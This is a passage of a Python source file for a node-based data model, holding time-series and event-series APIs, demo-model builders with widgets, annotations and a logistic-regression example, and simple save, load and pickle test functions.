get a time series table from variables (nodes of type "timeseries").
Args:
variables [list of ode descriptors]: nodes to be part the data table requested (ordered!)
tableDescriptor : a desc for the table where the variables reside
possible addressing of te request nodes:
1) ids or browsepaths of nodes (no tableDescriptor needed)
2) names of nodes and tableDescriptor of the table (names must be unique in the columns of the table)
startime, endTime [float]:
the start and endtime of the table given as seconds since epoch
we also allow the special case of endTime = 0 and startTime = -interval
we also allow the special case of startTime given and end time= 0
noBins(int): the number of samples to be returned inside the table between start end endtime,
if None is given, we return all samples (rows) we have in the table and to not aggregate
includeIntervalLimits [bool]: if set to true, we will include one more data point each left and right of the requested time
format: [enum] "default", "flat", see return description
includeAllNan: if set to true, we will return all nan in the data even if they don't match the resampling
we can also give a list of nodes for which we want the nans
resampleMethod [enum]:
how to resample if we need to; options are:
None (if not specified): sample and hold
"linear": linear interpolation
"linearfill": linear interpolation and also interpolate "nan" or "inf" values in the original data
toList: (bool) True: return data as python list, False: return numpy arrays
examples:
- get all data of the variables
data = m.get_time_series_table(["root.mytable.variables.a","root.mytable.variables.b"]) # get all data
- request max 300 values of data (this is what the UI does)
data = m.get_time_series_table(["a","b"],"root.mytable",start=1581483065.323,end=1581483080.323,noBins=300,includeIntervalLimits=True)
- request data and resample to equiditant 25 sec spacing, also fill possible nan values with interpolation
times = list(range(1581483065,1581483065+100,25))
data = m.get_time_series_table(["a","b"],"root.mytable",resampleTimes = times,resampleMethod = "linearfill")
Returns(dict)
formatting depends on the "format" option
"defaut": return the result as {"var_a":{"values":[],"__time":[]}, "var_b":{"values":[],"__time":[]..}
"flat" return the result as {"var_a":[], "var_a__time":[],"var_b":[],"var_b__time":[]....}
the variable descriptor are the ones given in the request
"__time" : list of timestamps for the returned table in epoch seconds as float64
"values": the list of float values of one of the requested variables
"""
if tableDescriptor:
tableId = self.get_id(tableDescriptor)
tableVars = self.get_leaves(tableId+".columns")
else:
tableId = None
if type(start) is str:
start = date2secs(start)
if type(end) is str:
end = date2secs(end)
with self.lock:
#first check if all requested timeseries exist and have type time series
#vars = [] #self.get_id(variables)
if not type(variables) is list:
variables= [variables]
varIds = {} # NodeId: request descriptor
for var in variables:
varId = self.get_id(var)
if not varId:
#try to find per columns and table desc
found = False
if tableId:
for tableVar in tableVars:
if tableVar["name"] == var:
varId = tableVar["id"]
found = True
break
if not found:
self.logger.error(f"requested variable {var} does not exist")
return False
if self.model[varId]["type"]!="timeseries":
self.logger.error(f"requested variable {var} not timeseries, instead {self.model[varId]['type']}")
return False
varIds[varId]=var #remeber it for later
if type(includeAllNan) is list:
#convert to ids
includeAllNan = self.get_id(includeAllNan)
table = self.ts.get_table(list(varIds.keys()), start=start, end=end, copy=copy, resampleTimes=resampleTimes, noBins = noBins, includeIntervalLimits=includeIntervalLimits,resampleMethod=resampleMethod,includeAllNan=includeAllNan)
#now wrap back the descriptor to the query, if is was a browsepath, we return and browsepath, if is was an id, we return id
# make some formatting
def convert(input,toList=toList):
if toList:
return list(input)
else:
return input
result = {}
for k,v in table.items():
if format=="flat":
result[varIds[k]]=convert(v["values"])
result[varIds[k]+"__time"]=convert(v["__time"])
else:
result[varIds[k]] = {"values":convert(v["values"]),"__time":convert(v["__time"])}
#if len(variables) == 1:
# #we only have one variable, so we return without descriptor
# result = result[list(result.keys())[0]]
return result
def time_series_get_info(self,name=None):
return self.ts.get_info(name)
def time_series_get_raw(self,desc,start=None,end=None):
"""
gets the time series as they are internally
Returns:
{"values":[2,2,3,3]., "__time":[1,k22,3,34,45]
"""
id = self.get_id(desc)
if not id:
return None
table = self.ts.get_table([id], start=start, end=end, copy=False, resampleTimes=None,
noBins=None, includeIntervalLimits=False,
resampleMethod=None)
result = table[id]
return result
def time_series_insert_blobs(self, tableDesc, blobs=[]):
""" blob is a dict or list of dicts of key and values containing one time base like
the descriptors of teh variables can be ids, browsepaths or just names (without dots)
if the descriptors are names, we try to find them in the model, they must exist there uniquely, otherwise
they cant be processed
we also autocreate the table or missing variables
the data will be put in a table:
- we try to find the table based on one of the variables, if not found, we create the table
{
"a": [1.5,1.6,1.7]m
"b": [2,3,4]
"__time" :[100001,100002,100003]
}
"""
if not type(blobs) is list:
blobs=[blobs]
#first, find the table
with self.lock:
tableId = self.get_id(tableDesc)
if not tableId:
#try to find the table from the first node
#table not found, create it
tableId = self.create_node_from_path(tableDesc,properties={"type":"table"})
if tableId:
columnsId = self.create_node(parent=tableId, name="columns", properties={"type": "referencer"})
variablesId = self.create_node(parent=tableId, name="variables", properties={"type": "folder"})
else:
self.logger.error(f"cant create table {tableDesc}")
return False
else:
columnsId = self.get_child(tableId,"columns")
variablesId = self.get_child(tableId, "variables")
#now we know the tableId, columnsId, variablesId
# iterate over all blobs and find the ids of the names in the blobs, if not found, create it
# exchange the descriptors to ids
desc2Id = {} # key: the descriptor from the input blob v: the id in the model
tableVars = self.get_leaves(columnsId)
desc2Id = {dic["name"]:dic["id"] for dic in tableVars} # key: the descriptor from the input blob v: the id in the model, preload with the names
#convert all to ids
newBlobs=[]
idsInBlobs=[]
for blob in blobs:
newBlob={}
for k,v in blob.items():
if k=="__time":
newBlob[k]=v
else:
#does this id already exist?
if k in desc2Id:
id = desc2Id[k]
else:
id = None
#try to find
for var in tableVars:
if var["name"] == k:
id = v["id"]
break
if not id:
#still not found, we need to create it
id = self.create_node(parent=variablesId,name=k,properties={"type": "timeseries"})
if not id:
self.logger.error(f"cant find or create {name}")
continue
else:
self.add_forward_refs(columnsId,[id])
desc2Id[k]=id #remember to speed up next time
newBlob[id] = v
idsInBlobs.append(id)
newBlobs.append(newBlob)
self.logger.debug(f"inserting blobs {len(newBlobs)}")
self.__notify_observers(idsInBlobs, "value")
result = self.ts.insert_blobs(newBlobs)
return result
# ########################################
# event series api
def event_series_create(self,desc,map={}):
id = self.get_id(desc)
if "eventMap" in self.model[id]:
self.model[id]["eventMap"].update(map)
else:
self.model[id]["eventMap"]=map.copy()
return self.ts.create(id)
def event_series_get_new_number_entry(self,id):
eventMap = self.model[id]["eventMap"]
numbers = [v for k, v in eventMap.items()]
newNumber = max(numbers)+1
while newNumber in numbers:
newNumber = newNumber+1
return newNumber
def event_series_get_event_number(self, desc, event, autoCreate=True):
id = self.get_id(desc)
if not id:
return None
with self.lock:
eventMap = self.model[id]["eventMap"] # a dict like {"starting":1, "machineStop":2,...}
if type(event) in [str,numpy.str_]:
if event not in [k for k,v in eventMap.items()]:
if not autoCreate:
return None
# we must put a new eventString
if eventMap == {}:
newEventNumber = 1
else:
newEventNumber = self.event_series_get_new_number_entry(id)
self.model[id]["eventMap"][event] = newEventNumber
return newEventNumber
else:
#is a known event string, get the number
return eventMap[event]
else:
#this is a number already, check if it is in the map
eventNumbers = [v for k,v in eventMap.items()]
if event in eventNumbers:
return event
else:
if not autoCreate:
return None
#must create a new entry
try:
#to make sure we have only numbers there
newEventString = "event_"+str(int(event))
self.model[id]["eventMap"][newEventString]=int(event)
except:
self.log_error()
return None
return event
def event_series_insert(self, desc, values=None, times=None, allowEventDuplicates = False):
"""
Args:
values: list of events, where the event is either an eventString or an event number
if values is a scalar, we assume that for all times the same event will be inserted
allowEventDuplicates: set this to true allowes the same events to appear multiple times on the same time
different events are always allowed on the same time
"""
id = self.get_id(desc)
if not id in self.model:
return None
if type(values)==type(None) or type(times)==type(None):
return None
if not(type(values) is list or type(values) is numpy.ndarray):
values = [values]*len(times)
#convert the values to numbers and create new map entry if needed
numbers = numpy.asarray([self.event_series_get_event_number(id,event) for event in values],dtype=numpy.int)
#convert the times to epoch if not already done
epochs = numpy.asarray([t if type(t) is not str else date2secs(t) for t in times ],dtype=numpy.float64)
if not allowEventDuplicates:
# we must delete the events which exist already at the same time with the same event
data = self.event_series_get(desc)
takeIndices = numpy.full(len(times),True)
for idx,tim in enumerate(times):
duplicates = numpy.where(data["__time"]==tim)[0]
for pos in duplicates:
if numbers[idx] == data["values"][pos]:
takeIndices[idx] = False
numbers = numbers[takeIndices]
epochs = epochs[takeIndices]
with self.lock:
#on the TimeSeries class the allowDuplicates means that the same time can appear mulitple times
# such that different or the same events can happen at the same time and thus produce the same
# time stamp in the time series
result = self.ts.insert(id,numbers, epochs, allowDuplicates=True)# we allow 2 events to appear on the same time!
self.__notify_observers(id, "value")
return result
def event_series_set(self,desc,values=None,times=None):
id = self.get_id(desc)
if not id in self.model:
return None
if self.lock:
# now "refresh" the event map
#self.model[id]["eventMap"]={}
numbers = [self.event_series_get_event_number(id, event) for event in values]
result = self.ts.set(id,values=numbers,times=times)
self.__notify_observers(id, "value")
return result
def event_series_get(self,desc, start=None,end=None,format="default",eventFilter=None):
"""
get events from a event series
Args:
desc: node descricptor
start , end [float]:
the start and endtime of the table given as seconds since epoch
we also allow the special case of endTime = 0 and startTime = -interval
we also allow the special case of startTime given and end time= 0
format: [enum] "default"
eventFilter : [string] a list of eventStrings as positive match filter
toList: (bool) True: return data as python list, False: return numpy arrays
examples:
- get all data of the variables
data = m.get_time_series_table(["root.mytable.variables.a","root.mytable.variables.b"]) # get all data
- request max 300 values of data (this is what the UI does)
data = m.get_time_series_table(["a","b"],"root.mytable",start=1581483065.323,end=1581483080.323,noBins=300,includeIntervalLimits=True)
- request data and resample to equiditant 25 sec spacing, also fill possible nan values with interpolation
times = list(range(1581483065,1581483065+100,25))
data = m.get_time_series_table(["a","b"],"root.mytable",resampleTimes = times,resampleMethod = "linearfill")
Returns(dict)
formatting depends on the "format" option
"defaut": return the result as {"values":[],"__time":[], "eventstrings": "map":{1:"myevent",2:"anotherevent"}
"""
id = self.get_id(desc)
if not id:
return None
data = self.ts.get_table([id], start=start, end=end)
if data == {}:
#this variable is not in the store
data = {id:{"values":numpy.asarray([]),"__time":numpy.asarray([])}}
eventMap = self.model[id]["eventMap"].copy()
reverseMap = {v:k for k,v in eventMap.items()}
values = data[id]["values"].astype(numpy.int)
times = data[id]["__time"]
#now filter
if eventFilter:
filter = []
if type(eventFilter) is not list:
eventFilter = [eventFilter]
for evString in eventFilter:
if evString in eventMap:
filter.append(eventMap[evString])
indices = [idx for idx,val in enumerate(values) if val in filter]
values = values[indices]
times = times[indices]
result = {
"values":values,
"__time":times,
"eventMap":eventMap,
"eventStrings":[reverseMap[v] for v in values]
}
if format == "iso":
#convert the timestamps to iso
result["__time"]=[epochToIsoString(t) for t in result["__time"]]
if format == "events":
existingEvents = set(result["values"])
events = {reverseMap[ev]:[] for ev in existingEvents}
for ev,ti in zip(result["values"],result["__time"]):
events[reverseMap[ev]].append(ti)
result["events"]=events
del result["values"]
del result["__time"]
del result["eventStrings"]
return result
def event_series_insert_blob(self,blob):
"""
insert events in various blob syntax
Args:
desc: the node descriptor
blob: a dictionary in various styles
a) {
"node": nodedescriptor
"events":"startMachine"
"__time": ["2018.01.01T00:10:08.445+02:00",1546437120.2,1546437121.2,1546437122.2]# allowes iso or epoch
}
b) {
"node": nodedescriptor
"events":["startMachine","stopMachine","startMachine","startMachine]
"__time": ["2018.01.01T00:10:08.445+02:00",1546437120.2,1546437121.2,1546437122.2]# allowes iso or epoch
}
c) "events:[
{"event":"startMachine",
"__time":"2018.01.01T00:10:08.445+02:00"
},
{"event":"stopMachine",
"__time":"2018.01.01T00:10:08.445+02:00"
}
Returns
true/false for success
"""
if type(blob["events"]) is not list:
#style a)
events = blob["events"]
times = blob["__time"]
else:
#events is a list
if type(blob["events"][0]) is dict:
#style c)
events = []
times = []
for d in blob["events"]:
events.append(d["event"])
times.append(d["__time"])
else:
#style b)
events = blob["events"]
times = blob["__time"]
return self.event_series_insert(blob["node"],events,times)
def event_series_delete(self,desc,start=None, end = None, eventsToDelete=[]):
id = self.get_id(desc)
if not id:
return None
if start == None and end == None and eventsToDelete == []:
#delete all
with self.lock:
self.model[id]["eventMap"]={}
result = self.ts.set(id, values=[], times=[])
else:
#delete some events
with self.lock:
data = self.ts.get_table([id])
if not start:
start = 0
if not end:
end = numpy.inf
times = data[id]["__time"]
values = data[id]["values"]
over = times>=start
under = times<=end
deleteMaskTime = over & under
if eventsToDelete == []:
deleteMaskValues = numpy.full(len(deleteMaskTime),True)
else:
deleteMaskValues = numpy.full(len(deleteMaskTime),False)
for ev in eventsToDelete:
evNumber = self.model[id]["eventMap"][ev]
mask = values == evNumber
deleteMaskValues = deleteMaskValues | mask
deleteMask = deleteMaskTime & deleteMaskValues
times = times[~deleteMask]
values = values[~deleteMask]
self.event_series_set(id,values,times)
print(data)
def get_object(self,desc):
id = self.get_id(desc)
if not id:
return False
with self.lock:
if not self.model[id]["type"] == "object":
return None
if "object" not in self.model[id]:
return None
return self.model[id]["object"]
def instantiate_object(self,desc,writeToModel=True):
id = self.get_id(desc)
if not id:
return False
with self.lock:
if not self.model[id]["type"] == "object":
return False
try:
className = self.model[id]["class"]
if "autoReload" in self.model[id] and self.model[id]["autoReload"]==True and self.global_auto_reload_enabled():
# must reload the module
module = importlib.reload(self.objectClasses[className]["module"])
classDefinition = getattr(module, className.split('.', 1).pop())
# now update our global list
self.objectClasses[className]["module"] = module
self.objectClasses[className]["class"] = classDefinition
classDefinition = self.objectClasses[className]["class"]
object = classDefinition(self.get_node(id)) #instantiate the object
if writeToModel:
self.model[id]["object"]=object
return object
except:
self.log_error()
return None
def instantiate_all_objects(self):
with self.lock:
#make a list first for iteration, we can't iterate over the model,
# as the instantiation of object might produce new nodes while we iterate
objects = [k for k,v in self.model.items() if v["type"] == "object"]
for id in objects:
try:
self.instantiate_object(id)
except:
self.log_error()
def reset_all_objects(self):
with self.lock:
#make a list first for iteration, we can't iterate over the model,
# as the instantiation of object might produce new nodes while we iterate
objects = [k for k,v in self.model.items() if v["type"] == "object"]
for id in objects:
try:
self.get_object(id).reset(None)
except:
self.log_error()
def global_auto_reload_enabled(self):
if self.get_value("root.system.enableAutoReload") == False:
return False
else:
return True # this will also be the case if the node is not there, as the get_value return None then
def create_test(self,testNo=1):
"""
this functions crates tests for demostrating purposes
"""
if testNo == 1:
self.create_node("root",name="variables",type="folder")
for var in ["f0","f1","f2","f3","count","time","back"]:
self.create_node("root.variables",name=var,type="column")
self.create_node_from_path('root.folder2.myconst',{"type":"const","value":"21data"})
self.create_node_from_path('root.folder2.myfkt', {"type": "function"})
#for the visu
self.create_node_from_path('root.visualization.pipelines.occupancy.url',{"type":"const","value":"http://localhost:5006/bokeh_web"})
self.create_node_from_path('root.visualization.pipelines.demo2.url',{"type":"const","value":"http://21data.io"})
#create an official table
template = [
{
"name": "description",
"type": "const",
"value": "this is a great table"
},
{
"name": "columns",
"type": "referencer",
},
{
"name": "timeField",
"type": "referencer",
},
{
"name": "numberOfRows",
"type": "variable",
"value": 0
}
]
self.create_node("root", name="mytable", type="table")
self.create_nodes_from_template("root.mytable", template=template)
for var in ["f0","f1","f2","f3","time","back"]:
self.add_forward_refs("root.mytable.columns",["root.variables."+var])
self.add_forward_refs("root.mytable.timeField", ["root.variables.time"])
#add data
startTime=datetime.datetime(2018,1,1,0,0,0,tzinfo=pytz.UTC)
vars={"f0":0.01,"f1":0.02,"f2":0.04,"f3":0.1,"back":0.01}
SIZE = 10*60 # in seconds units
STEP = 0.1
#!!! we are producing size/step time points
""" for i in range(SIZE):
dataDict = {}
for var in vars:
value = numpy.cos(2*numpy.pi*vars[var]*i/SIZE*3)
dataDict["root.variables."+var]=value
mytime = startTime + datetime.timedelta(seconds = i)
dataDict["root.variables.time"] = mytime
#print(mytime)
self.add_timeseries(dataDict)
"""
startEpoch = date2secs(startTime)
times = numpy.arange(startEpoch,startEpoch+SIZE,STEP,dtype=numpy.float64)
print("we have time:",times.shape)
for var in vars:
values = numpy.cos(2*numpy.pi*vars[var]*times)
id=self.get_id("root.variables."+str(var))
if var =="back":
#we make -1,0,1 out of it
values = numpy.round(values)
self.model[id]["value"]=values.tolist()
id = self.get_id("root.variables.time")
self.model[id]["value"]=(times).tolist()
#now correct the background
#now make some widget stuff
self.create_node_from_path('root.visualization.widgets.timeseriesOne',{"type":"widget"})
self.create_node_from_path('root.visualization.widgets.timeseriesOne.selectableVariables',
{"type":"referencer"})
self.create_node_from_path('root.visualization.widgets.timeseriesOne.selectedVariables',
{"type": "referencer"})
self.create_node_from_path('root.visualization.widgets.timeseriesOne.startTime',
{"type": "variable","value":None})
self.create_node_from_path('root.visualization.widgets.timeseriesOne.endTime',
{"type": "variable","value":None})
self.create_node_from_path('root.visualization.widgets.timeseriesOne.bins',
{"type": "const","value":300})
self.create_node_from_path('root.visualization.widgets.timeseriesOne.hasAnnotation',
{"type": "const", "value": True})
self.create_node_from_path('root.visualization.widgets.timeseriesOne.hasSelection',
{"type": "const", "value": False})
self.create_node_from_path('root.visualization.widgets.timeseriesOne.hasAnnotation.annotations',
{"type": "referencer"})
self.create_node_from_path('root.visualization.widgets.timeseriesOne.hasAnnotation.newAnnotations',
{"type": "folder"})
self.create_node_from_path('root.visualization.widgets.timeseriesOne.hasAnnotation.tags',
{"type": "const","value":["one","two"]})
self.create_node_from_path('root.visualization.widgets.timeseriesOne.hasAnnotation.colors',
{"type": "const","value":["yellow","brown","greay","green","red"]})
self.create_node_from_path('root.visualization.widgets.timeseriesOne.table',
{"type": "referencer"})
self.create_node_from_path('root.visualization.widgets.timeseriesOne.lineColors',
{"type": "const", "value": ["blue", "yellow", "brown", "grey", "red"]})
self.add_forward_refs('root.visualization.widgets.timeseriesOne.selectedVariables',['root.variables.f0','root.variables.f1','root.variables.f3'])
self.add_forward_refs('root.visualization.widgets.timeseriesOne.selectableVariables',['root.variables'])
self.add_forward_refs('root.visualization.widgets.timeseriesOne.table',['root.mytable'])
self.create_node_from_path('root.visualization.widgets.timeseriesOne.observer',{"type":"referencer"})
self.create_node_from_path('root.visualization.widgets.timeseriesOne.observerUpdate', {"type": "const","value":["line","background","annotations"]})
#now the annotations
anno = [
{
"name": "tags",
"type": "const",
"value": ["one","two"]
},
{
"name": "startTime",
"type": "const",
"value": None
},
{
"name": "endTime",
"type": "const",
"value": None
},
{
"name": "text",
"type": "const",
"value": "this is a great annotation"
}
]
tags=["one","two","one","one","two","two","one","one","one","two","one","one"]
self.create_node_from_path("root.annotations",{"type":"folder"})
startTime = datetime.datetime(2018, 1, 1, 0, 0, 0, tzinfo=pytz.UTC)
for i in range(10):
newAnno = copy.deepcopy(anno)
newAnno[1]["value"] = (startTime + datetime.timedelta(minutes=(i*10))).isoformat()
newAnno[2]["value"] = (startTime + datetime.timedelta(minutes=(i*10+1))).isoformat()
newAnno[0]["value"] = [tags[i],tags[i+1]]
newAnnoPath = "root.annotations.anno"+str(i)
self.create_node_from_path(newAnnoPath,{"type":"annotation"})
self.create_nodes_from_template(newAnnoPath,newAnno)
#also add the annotations to the widget
self.add_forward_refs("root.visualization.widgets.timeseriesOne.hasAnnotation.annotations",["root.annotations","root.visualization.widgets.timeseriesOne.hasAnnotation.newAnnotations"])
#make a real function
self.create_node_from_path("root.functions",{"type":"folder"})
self.create_nodes_from_template("root.functions",[self.templates["testfunction.delayFunctionTemplate"]])
#now make cutom function to trigger something
self.create_nodes_from_template("root.functions",[self.templates["counterfunction.counterFunctionTemplate"]])
#now hook the function output to the observer of the plot
self.add_forward_refs('root.visualization.widgets.timeseriesOne.observer',['root.functions.counterFunction.output'])
#now make custom buttons
buttons = [
{
"name":"button1",
"type":"folder",
"children":[
{"name":"caption","type":"const","value":"start learner"},
{"name":"counter", "type": "variable", "value":0},
{"name": "onClick", "type": "referencer"}
]
}
]
self.create_node_from_path("root.visualization.widgets.timeseriesOne.buttons",{"type":"folder"})
self.create_nodes_from_template("root.visualization.widgets.timeseriesOne.buttons",buttons)
self.add_forward_refs("root.visualization.widgets.timeseriesOne.buttons.button1.onClick",["root.functions.counterFunction"])
#now the backgrounds
self.create_node_from_path("root.visualization.widgets.timeseriesOne.hasBackground",{"type":"const","value":True})
self.create_node_from_path("root.visualization.widgets.timeseriesOne.background",{"type":"referencer"})
self.add_forward_refs("root.visualization.widgets.timeseriesOne.background",["root.variables.back"])
self.create_node_from_path("root.visualization.widgets.timeseriesOne.backgroundMap",{"type":"const","value":{"1":"red","0":"green","-1":"blue","default":"white"}})
self.show()
elif testNo == 2:
#we take the full test number 1 and rearrange some things
self.create_test(1)
self.currentModelName = "occupancydemo"
import data.occupancy_data.occupancy as occ
occData = occ.read_occupancy("./data/occupancy_data/datatest2.txt")
#create an official table
template = [
{
"name": "description",
"type": "const",
"value": "this is the occupancy data table"
},
{
"name": "columns",
"type": "referencer",
},
{
"name": "timeField",
"type": "referencer",
},
{
"name": "variables",
"type": "folder",
}
]
self.create_node("root", name="occupancy", type="table")
self.create_nodes_from_template("root.occupancy", template=template)
for var in occData:
path = "root.occupancy.variables."+var
self.create_node_from_path(path,{"type":"column"})
self.set_value(path,occData[var])
self.add_forward_refs("root.occupancy.columns",[path])
self.add_forward_refs("root.occupancy.timeField",["root.occupancy.variables.date"])
#now create the classification
self.create_node("root.occupancy", name="classification", type="column")
self.set_value("root.occupancy.classification", [0]*len(occData[list(occData.keys())[0]]))
self.add_forward_refs("root.occupancy.columns", ["root.occupancy.classification"])
#create another TS-widget
self.create_node_from_path('root.visualization.widgets.timeseriesOccupancy', {"type": "widget"})
self.create_nodes_from_template('root.visualization.widgets.timeseriesOccupancy',modeltemplates.timeseriesWidget)
self.create_nodes_from_template('root.visualization.widgets.timeseriesOccupancy.buttons.button1',modeltemplates.button)
self.add_forward_refs('root.visualization.widgets.timeseriesOccupancy.selectedVariables',["root.occupancy.variables.Temperature"])
self.add_forward_refs('root.visualization.widgets.timeseriesOccupancy.selectableVariables',["root.occupancy.variables"])
self.add_forward_refs('root.visualization.widgets.timeseriesOccupancy.table',['root.occupancy'])
self.add_forward_refs('root.visualization.widgets.timeseriesOccupancy.background',['root.occupancy.classification'])
self.set_value('root.visualization.widgets.timeseriesOccupancy.backgroundMap', {"0": "brown", "1": "yellow", "-1": "blue", "default": "white"}) #match annotation colors
#self.set_value('root.visualization.widgets.timeseriesOccupancy.backgroundMap', {"0": "blue", "1": "black", "-1": "blue", "default": "white"}) #match annotation colors
self.set_value('root.visualization.widgets.timeseriesOccupancy.hasAnnotation.tags',["busy","free"])
#now create the logistic regression
self.create_nodes_from_template('root',[self.templates["logisticregression.logisticRegressionTemplate"]])
self.add_forward_refs('root.logisticRegression.input',['root.occupancy.variables.Temperature', 'root.occupancy.variables.Light','root.occupancy.variables.CO2'])
self.add_forward_refs('root.logisticRegression.output', ['root.occupancy.classification'])
self.add_forward_refs('root.logisticRegression.annotations',['root.visualization.widgets.timeseriesOccupancy.hasAnnotation.newAnnotations'])
self.set_value('root.logisticRegression.categoryMap', {"busy": 1, "free": 0})
#also hook the button on it
self.add_forward_refs('root.visualization.widgets.timeseriesOccupancy.buttons.button1.onClick',['root.logisticRegression'])
self.add_forward_refs('root.visualization.widgets.timeseriesOccupancy.observer',['root.logisticRegression.executionCounter']) # observe the execution of the scorer
self.show()
elif testNo == 3:
# make some nodes
for id in range(10):
self.create_node_from_path("root.add.var"+str(id), {"type": "variable", "value": id+100})
for id in range(100):
self.create_node_from_path("root.remove.var"+str(id), {"type": "variable", "value": id+100})
self.create_node_from_path("root.change_name_one")
self.create_node_from_path("root.change_value")
self.create_node_from_path("root.move.first")
self.create_node_from_path("root.move.second")
self.create_node_from_path("root.refs",properties={"type":"referencer"})
self.add_forward_refs("root.refs",["root.move.first","root.move.second","root.move"])
#now start a thread that changes the tree periodically
def __update_tree():
while True:
time.sleep(3.0)
with self.lock:
self.logger.debug("__update_tree")
self.create_node_from_path("root.add.dyn"+str(uuid.uuid4()))
removeFolder = self.get_id("root.remove")
if self.model[removeFolder]["children"]:
self.delete_node(self.model[removeFolder]["children"][0])
id = self.get_id("root.change_name_one")
if id:
self.model[id]["name"]="change_name_two"
else:
id = self.get_id("root.change_name_two")
self.model[id]["name"]="change_name_one"
id = self.get_id("root.move")
self.model[id]["children"].reverse()
id=self.get_id("root.refs")
self.model[id]["forwardRefs"].reverse()
self.set_value("root.change_value",int(uuid.uuid4())%100)
self.testThread = threading.Thread(target=__update_tree)
self.testThread.start()
if __name__ == '__main__':
def test1():
m=Model()
m.create_node("root",name="folder1")
m.create_node("root.folder1",name="folder2")
m.create_node("2",name="second")
m.create_node("root",name="myreferencer",type="referencer")
m.create_node("root.folder1",name="myvar",type="variable")
m.set_value("root.folder1.myvar",44.5)
m.add_forward_refs("root.myreferencer",["root.folder1"])
m.add_property("root.folder1.folder2","uasource","192.168.5.6")
m.show()
m.get_model()
m.delete_node("root.myreferencer")
return m
def test_template():
m=Model()
template = {
"myfunction": {
"type": "function",
"value": "someValue",
"opcua":"opc.tcp://129.160.1.1:4880::n2=2;s=mystrin"
},
"myreferencer": {
"type": "referencer",
"forwardRefs": ['.myfolder.var1', '.myfolder.var2', '.myfolder.var3']
},
"myfolder": {
"type": "folder",
"children": {
"var1": {"type": "const", "value": "1"},
"var2": {"type": "variable"},
"var3": {"type": "timeseries"},
}
},
}
m.create_nodes_from_template(template=template)
m.show()
def save_test():
print("save and load test")
m=Model()
m.create_test()
m.save("savetest")
n=Model()
n.load("savetest")
if len(n.get_model())!= len(m.get_model()):
print("unequal size")
return False
#now compare
mModel = m.get_model()
nModel = n.get_model()
for nodeId in mModel:
#print("check",nodeId)
try:
if nModel[nodeId]!=mModel[nodeId]:
print("unequal before after ",nodeId,m[nodeId],n[nodeId])
return False
except:
print("cant find",nodeId)
return False
print("savetest passed")
return True
def plugintest():
m=Model()
m.create_node("root", name="folder1")
m.create_nodes_from_template("root.folder1",m.templates["testfunction.delayFunctionTemplate"])
m.show()
m.execute_function("root.folder1.delayFunction")
statusNode = m.get_node("root.folder1.delayFunction.status")
progressNode = m.get_node("root.folder1.delayFunction.progress")
while(statusNode.get_value()!="finished"):
print("progress is",progressNode.get_value())
time.sleep(0.3)
print("execution re===================")
m.show()
def getnodetest():
m=Model()
m.create_node("root", name="folder1")
m.create_node("root.folder1", name="folder2")
m.create_node("root.folder1", name="myvar", type="variable")
myvar = m.get_node("root.folder1.myvar")
myvar.set_value(33)
print("value",myvar.get_value())
def testfunctions_test():
m = Model()
m.create_test(1)
m.show()
table= m.get_timeseries_table(["root.variables.f0","root.variables.f1","root.variables.time"],noBins=25)
print("shape",table.shape)
for row in table.T:
for elem in row:
print(str("%3.7f"%elem)," ",end="")
print("")
def time_conver_test():
d1=datetime.datetime(2018,1,1,0,0,0,tzinfo = pytz.UTC)
print(d1)
s1 = date2secs(d1)
print(s1)
d2 = secs2date(s1)
print(d2)
d3 ="2018-01-01T00:10:08.445+02:00"
print(d3)
d4=dateutil.parser.parse(d3)
print(d4)
s4=date2secs(d4)
print(s4)
d5=secs2date(s4)
print(d5)
def table_test():
m=Model()
print("this test creates a table and writes some data in")
template = [
{
"name": "type",
"type": "const",
"value": "timeSeriesTable"
},
{
"name":"description",
"type": "const",
"value": "this is a great table"
},
{
"name":"data",
"type":"folder",
"children":[
{"name":"var1","type": "column","value":[]},
{"name":"var2","type": "column","value":[]},
{"name":"var3","type": "column","value":[]},
{"name":"time","type": "column","value":[]}
]
},
{
"name":"columns",
"type": "referencer",
"forwardRefs": ['.data.var1', '.data.var2', '.data.var3',".data.time"]
},
{
"name":"timeField",
"type": "referencer",
"forwardRefs":['.data.time']
},
{
"name": "numberOfRows",
"type": "variable",
"value":0
}
]
m.create_node("root", name="mytable",type="table")
m.create_nodes_from_template("root.mytable",template=template)
m.show()
#now write some data with autocreates
mytime = datetime.datetime.now(pytz.timezone("CET"))
myepoch=date2secs(mytime)
blob = {"root.mytable.data.var1":1,"root.mytable.data.var2":2,"root.mytable.data.time":myepoch,"root.mytable.data.newvar":99}
m.append_table(blob)
m.show()
#now add more data but leave out var
blob = {"root.mytable.data.var1": 10, "root.mytable.data.var2": 20, "root.mytable.data.time": myepoch}
m.append_table(blob)
blob = {"root.mytable.data.var1": 10, "root.mytable.data.var2": 20, "root.mytable.data.var4": 4, "root.mytable.data.time": myepoch}
m.append_table(blob)
m.show()
def test_table_autocreate():
mytime = datetime.datetime.now(pytz.timezone("CET"))
myepoch=date2secs(mytime)
blob = {"root.data.var1":1,"root.data.var2":2,"root.folder.time":myepoch,"root.data.newvar":99}
m=Model()
m.append_table(blob)
m.show()
def test_create_from_path():
m=Model()
m.create_node_from_path("root.myfolder.myfolder2.var",{"type":"variable","value":33})
m.show()
def test_get_children():
m=Model()
m.create_test()
nodes = m.get_node_with_children('root.folder2')
#lastnode = '10'
#print(m.get_path(lastnode))
print(json.dumps(nodes,indent=4))
def test_create():
m=Model()
m.create_test(1)
m.show()
def test_get_forwards():#
#in this test, we check the forwards get results over folders, referencers etc.
m=Model()
m.create_node_from_path("root.folder.var1",{"type":"variable"})
m.create_node_from_path("root.folder.var2", {"type": "variable"})
m.create_node_from_path("root.folder.var3", {"type": "variable"})
m.create_node_from_path("root.ref1", {"type": "referencer"})
m.create_node_from_path("root.ref2", {"type": "referencer"})
m.add_forward_refs("root.ref1",["root.folder"])
m.add_forward_refs("root.ref2", ["root.ref1"])
m.show()
res=m.get_leaves("root.ref1")
print(res)
for k in res:
print(k["name"])
res = m.get_leaves("root.ref2")
for k in res:
print(k["name"])
def pickle_save():
import pickle
m=Model()
m.create_test(2)
# write python dict to a file
output = open('pickle_save.pkl', 'wb')
pickle.dump(m.get_model(), output)
output.close()
n=Model()
# read python dict back from the file
pkl_file = open('pickle_save.pkl', 'rb')
restore = pickle.load(pkl_file)
pkl_file.close()
print("compare after pickle restre",restore==m.get_model())
if __name__ == '__main__':
#############
#test1()
#ts_test1()
#test_template()
save_test()
pickle_save()
#plugintest()
#getnodetest()
#table_query_test()
#testfunctions_test()
#time_conver_test()
#test_create_from_path()
#table_test()
#test_table_autocreate()
#test_get_children()
#test_get_forwards()
#test_create()
#read in the commmand line options:
